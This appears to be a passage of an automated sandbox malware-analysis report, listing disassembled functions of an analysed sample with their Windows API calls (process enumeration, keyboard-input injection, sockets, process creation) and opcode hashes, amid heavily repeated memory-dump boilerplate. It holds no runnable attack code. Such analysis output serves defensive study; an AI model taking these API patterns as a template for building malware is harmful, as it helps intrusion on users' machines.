                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                                                        • Opcode ID: c2e62903829374331ddbbec4ae94c608e1be1530b963d8432cd8f3eb1fbe8be0
                                                                                                                                                                        • Instruction ID: 6059888567bc70a0e384011f88189c618dfcfac89a2f06e32417245845708953
                                                                                                                                                                        • Opcode Fuzzy Hash: c2e62903829374331ddbbec4ae94c608e1be1530b963d8432cd8f3eb1fbe8be0
                                                                                                                                                                        • Instruction Fuzzy Hash: D32181B5611619BFDB01DF18DC85EBB77ADEB5A3A4F100059FA049B361CB70EC25CAA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002F42DC
                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002F42EC
                                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002F4312
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                                                        • String ID: Listbox
                                                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                                                        • Opcode ID: ca786bc1d46c3fec80fbe86172b9b7f88cb20c4a8bd488519d6c1b90cbd3a076
                                                                                                                                                                        • Instruction ID: 3f1aa2d2a6639a9644dd87713988b2cd304bd5384d35f525d901841fa34bba8e
                                                                                                                                                                        • Opcode Fuzzy Hash: ca786bc1d46c3fec80fbe86172b9b7f88cb20c4a8bd488519d6c1b90cbd3a076
                                                                                                                                                                        • Instruction Fuzzy Hash: BC218332621119BBEB119F94DC85FBF776EEB897A4F118134FA009B190C6B19C618B90
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 002D544D
                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002D54A1
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,002FDCD0), ref: 002D5515
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                                                        • String ID: %lu
                                                                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                                                                        • Opcode ID: f64002dcd903815bd73f66d6e0983921e3e7d0a6eb7492b9b639dad889fe83bd
                                                                                                                                                                        • Instruction ID: 706b39d2d663d22597f6c49ab08da2e974dd1722d76573248d24e893fb510808
                                                                                                                                                                        • Opcode Fuzzy Hash: f64002dcd903815bd73f66d6e0983921e3e7d0a6eb7492b9b639dad889fe83bd
                                                                                                                                                                        • Instruction Fuzzy Hash: 73316170A10109AFDB11DF54C885EAA77B9EF05304F1440A5F909DB362DB71EE95CF61
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetActiveWindow.USER32 ref: 002F8339
                                                                                                                                                                        • EnumChildWindows.USER32(?,002F802F,00000000), ref: 002F83B0
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: (3$(3
• API String ID: 3814560230-4129766594
• Opcode ID: a5a2bef351d6defd9a6203d777c0720589d0fdfc82124d3d5656bcc436b256e2
• Instruction ID: e70272e05c6d791408157581eba7bc935b40c419047a217653f4a665f85c4ac3
• Opcode Fuzzy Hash: a5a2bef351d6defd9a6203d777c0720589d0fdfc82124d3d5656bcc436b256e2
• Instruction Fuzzy Hash: ED213E75111609DFC715CF28E880AA6F7F5FB49760F200669F976973A0DB70A860DF50
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002F4CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002F4D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002F4D0F
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e522beeff9b93d2b784ae8ac20b27ee4a0d2a5162773640554efbc68264956b3
• Instruction ID: c2146ae8b59bbf75092109feb5b6494fc8f69f05a438364a4accc039bc36a67f
• Opcode Fuzzy Hash: e522beeff9b93d2b784ae8ac20b27ee4a0d2a5162773640554efbc68264956b3
• Instruction Fuzzy Hash: 0011233125020CBEEF216F65DC06FBBBBACEF85BA4F110524FA51E60A0C2B1DC609B10
APIs
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
  • Part of subcall function 002C36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002C3712
  • Part of subcall function 002C36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C3723
  • Part of subcall function 002C36F4: GetCurrentThreadId.KERNEL32 ref: 002C372A
  • Part of subcall function 002C36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002C3731
• GetFocus.USER32 ref: 002C38C4
  • Part of subcall function 002C373B: GetParent.USER32(00000000), ref: 002C3746
• GetClassNameW.USER32(?,?,00000100), ref: 002C390F
• EnumChildWindows.USER32(?,002C3987), ref: 002C3937
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: bbebcd3ff604253bb18e77bc90ce232b05d82c63df6c3b7549b067877cc8bebe
• Instruction ID: e5fb494b09fa78b88ef6df586a3645524ba51aea4ab148050ce2296f37a0ceb0
• Opcode Fuzzy Hash: bbebcd3ff604253bb18e77bc90ce232b05d82c63df6c3b7549b067877cc8bebe
• Instruction Fuzzy Hash: 4711D271610209ABCF11BF749C85FED77AAAF98340F008579F9099B292CE719965DF20
APIs
• DeleteObject.GDI32(?), ref: 00265A34
• DestroyWindow.USER32(?,002637B8,?,?,?,?,?,00263709,?,?), ref: 00265A91
Strings
Similarity
• API ID: DeleteDestroyObjectWindow
• String ID: <)3$<)3
• API String ID: 2587070983-3443154064
• Opcode ID: d99683ce171b4ceb5a80f8cc3352289068ca68927334195c15c46981bce090cc
• Instruction ID: 3c51276d6f1cf8ab11d4259227bb57e1f7cbff64af0c8f3f99b128f48fe9ad29
• Opcode Fuzzy Hash: d99683ce171b4ceb5a80f8cc3352289068ca68927334195c15c46981bce090cc
• Instruction Fuzzy Hash: E921C734226A12CFDB1ADF59E8D4B2633E9BB45321F155169F8029B261CB74DCB4CB01
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002F6360
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002F638D
• DrawMenuBar.USER32(?), ref: 002F639C
Strings
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: afdee3d7c633a88ba8f2ae90cdc195e86352f1c1b8cd2b334d65e426f2f10f8d
• Instruction ID: f9406b4cf430411fa39689dab005531314403828d143b43e0e5be94714e844b8
• Opcode Fuzzy Hash: afdee3d7c633a88ba8f2ae90cdc195e86352f1c1b8cd2b334d65e426f2f10f8d
• Instruction Fuzzy Hash: 1F01C435520218AFDB109F10DC88BBEBBB5FF457A0F1080E9E50AD6150CB308995EF21
APIs
• GetForegroundWindow.USER32(?,003328E0,002FAD55,000000FC,?,00000000,00000000,?), ref: 002F823F
• GetFocus.USER32 ref: 002F8247
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
  • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
• SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002F82B4
Strings
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: (3
• API String ID: 3601265619-113007392
• Opcode ID: a8d38d77ac44ff33e2be77d27f559ec0cc3cd7d25225e491b606a853ab3d45a8
• Instruction ID: a224e5523b392cfb4b4a9fdec3cf1dac1aff188ad3da2d982c5c925f04df9705
• Opcode Fuzzy Hash: a8d38d77ac44ff33e2be77d27f559ec0cc3cd7d25225e491b606a853ab3d45a8
• Instruction Fuzzy Hash: A9017531602945CFC315DF78D859A76B3E6EB89360F140179E9168B2A0CF316C57CB40
APIs
• DestroyAcceleratorTable.USER32(?), ref: 002F8576
• CreateAcceleratorTableW.USER32(00000000,?,?,?,002DBE96,00000000,00000000,?,00000001,00000002), ref: 002F858C
• GetForegroundWindow.USER32(?,002DBE96,00000000,00000000,?,00000001,00000002), ref: 002F8595
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                        • String ID: (3
                                                                                                                                                                        • API String ID: 986409557-113007392
                                                                                                                                                                        • Opcode ID: e3793872458afa7e94bcaa8d39f72db42118fd5569f8da0b00226896f7798d2b
                                                                                                                                                                        • Instruction ID: cd91696ce3117d58c5458326694fdb2f56cce1ae24d43714e2ef1d05f1bdc06b
                                                                                                                                                                        • Opcode Fuzzy Hash: e3793872458afa7e94bcaa8d39f72db42118fd5569f8da0b00226896f7798d2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B012930611709CFCB25DF69EC88B76B7AAFB043A1F518529F611D62B0DB30A9A4CF40
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00334038,0033407C), ref: 002F8C1A
• CloseHandle.KERNEL32 ref: 002F8C2C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: 8@3$|@3
• API String ID: 3712363035-3526064959
• Opcode ID: fbf57d2f2be392362157be771a1916e7bf1a86057faeb4f0553a5abb97412d99
• Instruction ID: 97629d1d1e7c5e709f7a04268ebfb73e8d0492852be58bb17b526878b7051426
• Opcode Fuzzy Hash: fbf57d2f2be392362157be771a1916e7bf1a86057faeb4f0553a5abb97412d99
• Instruction Fuzzy Hash: 1DF05EB6651314BBF3156B60ACC9F77BE9CEB04390F000021BB08E61A1E6756C14CBB9
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 002BE797
• FreeLibrary.KERNEL32 ref: 002BE7BD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
• Opcode ID: f01b827a13bd4be0ef1471578c2624025106b3e835a9f67516a3e0408f1781a0
• Instruction ID: b1da9ae935db3ebc222b783988b2e7f04fcab489b420988b2868ba657bab3248
• Opcode Fuzzy Hash: f01b827a13bd4be0ef1471578c2624025106b3e835a9f67516a3e0408f1781a0
• Instruction Fuzzy Hash: 1CE02B71832532DFDF728B205C98EFB73296F107C0B160574E906E2000DB70CC64C654
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c512a8aafd68af9f14bbe83f746c69bc0a691f3b3b83ddec0789e9421e8b2be
• Instruction ID: a62e7cf0fc36ccf3e01117279e083e101024fbb8245e494a3505c571e8355dbb
• Opcode Fuzzy Hash: 6c512a8aafd68af9f14bbe83f746c69bc0a691f3b3b83ddec0789e9421e8b2be
• Instruction Fuzzy Hash: 61C15975A1020AEFDB04CF94C884FAEB7B5FF48708F108699E505AB251D771EE91CB90
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction ID: 6a1493ceb34ad4b1643135825c85e0959e0c9533d2ff9bd337e5ac282c4cd69a
• Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction Fuzzy Hash: F4A169719303869FEF11EF28C891FAEBBE4EF15314F2442ADE9559B281C2349962CB54
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0EE0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0EF8
• CLSIDFromProgID.OLE32(?,?,00000000,002FDCE0,000000FF,?,00000000,00000800,00000000,?,00300BD4,?), ref: 002C0F1D
• _memcmp.LIBVCRUNTIME ref: 002C0F3E
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: f11dd4861c20d23e25002da12dc009bb2894b432165f9a715f74c47e3addf310
• Instruction ID: 528feef782b3febef5c985d9827a4d6b2bb9684fe4fc437d2c296a764d7d1f2b
• Opcode Fuzzy Hash: f11dd4861c20d23e25002da12dc009bb2894b432165f9a715f74c47e3addf310
• Instruction Fuzzy Hash: 29811971A1010AEFCB14DF94C984EEEB7B9FF89315F204598F506AB250DB71AE46CB60
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 002EB10C
• Process32FirstW.KERNEL32(00000000,?), ref: 002EB11A
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
• Process32NextW.KERNEL32(00000000,?), ref: 002EB1FC
• CloseHandle.KERNEL32(00000000), ref: 002EB20B
  • Part of subcall function 0027E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,002A4D73,?), ref: 0027E395
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: a2ada50076621eabf07992331a2e6f92923e2c1543936f28ab186c4614dd0794
• Instruction ID: 333d82b8949523a61f9827bb924406192e2034f0c46f3f35e24fc88a85e9a182
• Opcode Fuzzy Hash: a2ada50076621eabf07992331a2e6f92923e2c1543936f28ab186c4614dd0794
• Instruction Fuzzy Hash: E7516AB1518300AFD311EF24D886A6BBBE8FF88754F40492DF58997291EB30D964CF92
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
• API ID: _free
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 002E255A
• WSAGetLastError.WSOCK32 ref: 002E2568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002E25E7
• WSAGetLastError.WSOCK32 ref: 002E25F1
• API ID: ErrorLast$socket
APIs
• GetWindowRect.USER32(?,?), ref: 002F6D1A
• ScreenToClient.USER32(?,?), ref: 002F6D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 002F6DBA
• API ID: Window$ClientMoveRectScreen
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002D61C8
• GetLastError.KERNEL32(?,00000000), ref: 002D61EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002D6213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002D623F
• API ID: CreateHardLink$DeleteErrorFileLast
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002CB473
• SetKeyboardState.USER32(00000080), ref: 002CB48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002CB4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002CB54F
• API ID: KeyboardState$InputMessagePostSend
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002CB5B8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 002CB5D4
• PostMessageW.USER32(00000000,00000101,00000000), ref: 002CB63B
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002CB68D
                                                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                                                        • Opcode ID: 647b1d55422b67d384e8a5cb011567f86f0fb8d9c1991ab9b3aa3bbace93d4ea
                                                                                                                                                                        • Instruction ID: 6aa61df39610d98cc98107ee1951295aecba939b8c1df8b58c3bcbab25d52199
                                                                                                                                                                        • Opcode Fuzzy Hash: 647b1d55422b67d384e8a5cb011567f86f0fb8d9c1991ab9b3aa3bbace93d4ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 51313B30D206095EFF268F64C80AFFB7BAEAF84310F24432EE481861D1C3748965DB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 002F80D4
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002F814A
                                                                                                                                                                        • PtInRect.USER32(?,?,?), ref: 002F815A
                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 002F81C6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                                                        • Opcode ID: d02faabb5e22b850afa4b68cb27a027932e2a031ad9269dcb340c7d59816618f
                                                                                                                                                                        • Instruction ID: 9b5ebec50723a524ff2148fc0054fc7f11cd98f3f7d3f316e218d648a2d0427d
                                                                                                                                                                        • Opcode Fuzzy Hash: d02faabb5e22b850afa4b68cb27a027932e2a031ad9269dcb340c7d59816618f
                                                                                                                                                                        • Instruction Fuzzy Hash: 61418F30A10219DFDB12CF58D894ABBF7F5BB45394F1442B8EA589B261CB71A862CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002F2187
                                                                                                                                                                          • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
                                                                                                                                                                          • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
                                                                                                                                                                          • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
                                                                                                                                                                        • GetCaretPos.USER32(?), ref: 002F219B
                                                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 002F21E8
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002F21EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                                                        • Opcode ID: 61ff8b7d94a8caf0f8855b6bb9672cc51d07e848dbfd2d1f0ccac690359d27c7
                                                                                                                                                                        • Instruction ID: e1ac4c33bba2b53588dfeb49a05c28cc9e891d47ed8c6914afffa75978c77298
                                                                                                                                                                        • Opcode Fuzzy Hash: 61ff8b7d94a8caf0f8855b6bb9672cc51d07e848dbfd2d1f0ccac690359d27c7
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B316171D10109AFCB04EFA9C881CAEBBFCEF58304B5044AAE515E7211DA719E95CFA0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE8E2
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE8F9
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002CE924
